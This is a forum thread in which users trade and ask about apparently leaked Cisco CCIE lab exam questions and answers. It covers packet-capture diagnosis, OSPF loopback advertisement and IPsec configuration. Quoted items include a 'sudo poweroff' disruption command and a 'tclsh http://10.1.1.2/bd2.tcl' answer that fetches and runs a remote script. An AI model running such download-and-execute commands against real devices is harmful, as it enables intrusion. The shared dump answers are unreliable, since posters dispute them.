One guy passed TS1, DIAG H3, CFG H3

I want to share his feedback for you guys.

**Hidden Content: Thanks to see the content**

thanks for sharing

Hi ,

thanks for feedback. I have just 2 questions:

Quote:

---

2) What command can disrupt the box:
Filter tcp.stream eq 4 OR tcp.stream eq 2 can not work in exam
OR filter tcp.port==3001, flow tcp stream, you cand find command "Sudo poweroff"
- :P
- @
- Sharkfest;
- Kill;
- Sudo poweroff; -----> HERE
- Kill -9 &;

---

Still, unclear how have you solved? Following stream stream? or just chosed sudo poweroff?

Quote:

---

3)Identify the command Attacker use. Remember: tclsh http:///b2d.tcl
- Copy http://10.1.1.1/bd2.tcl ;
- Tclsh http://10.1.1.1/bd2.tcl ;
- Tclsh http://10.1.1.2/bd2.tcl; -----> HERE
- http://10.1.1.1/bd2.tcl ;
- http://10.1.1.2/bd2.tcl

---

Could you explain, reason to choosing this option? Because 10.1.1.2 is victim ,yes? But it does not have http server. Attacker which is 10.1.1.1 has http server enabled on it.

regards,

can you share H3 soln ?

Quote:

---

Originally Posted by CiscoCCDE

I want to share his feedback for you guys.

***Hidden content cannot be quoted.***

---

Thanks for your feedback.

Quote:

---

Originally Posted by CiscoCCDE

I want to share his feedback for you guys.

***Hidden content cannot be quoted.***

---

Thanks for your feedback.

thanks for sharing

Quote:

---

Originally Posted by CiscoCCDE

I want to share his feedback for you guys.

***Hidden content cannot be quoted.***

---

Quote:

---

Originally Posted by CiscoCCDE

I want to share his feedback for you guys.

***Hidden content cannot be quoted.***

---

Thanks

Thanks for sharing

Quote:

---

Originally Posted by cciestudy2018

Hi ,

thanks for feedback. I have just 2 questions:



Still, unclear how have you solved? Following stream stream? or just chosed sudo poweroff?





Could you explain, reason to choosing this option? Because 10.1.1.2 is victim ,yes? But it does not have http server. Attacker which is 10.1.1.1 has http server enabled on it.

regards,

---

Quote:

---

Originally Posted by freebsd321

Thanks for your feedback.

---

Quote:

---

Originally Posted by mistyccie

Thanks

---

Quote:

---

Originally Posted by CiscoCCDE

I want to share his feedback for you guys.

***Hidden content cannot be quoted.***

---

thanks

Hi,

--- Section 2.2: OSPF in DC#1 --> OSPF has been configured in all device.
But need to add lo123 in R14 and R15 to ospf

Can anyone explain why do you need to advertise Loopback 123 on R14 and R15 into DC OSPF? According to the loopbacks 123 on R24 and R25, that should be a /28 subnet which would break the restriction in section 2.2.
"Host loopbacks are the only OSPF intra-area prefixes that may appear in any DC devices’ routing table"

Is this a specific requirement on the exam? If so, then the redistribution would make them external instead of intra-area.

Thanks.

Hi, can anyone post configuration for section 3.4 L2LIPSec

Quote:

---

Originally Posted by CiscoCCDE

I want to share his feedback for you guys.

***Hidden content cannot be quoted.***

---

Thank you for sharing!

Quote:

---

Originally Posted by CiscoCCDE

I want to share his feedback for you guys.

***Hidden content cannot be quoted.***

---

maybe is is an errata and lo123 should be advertised into bgp ??

thank you very much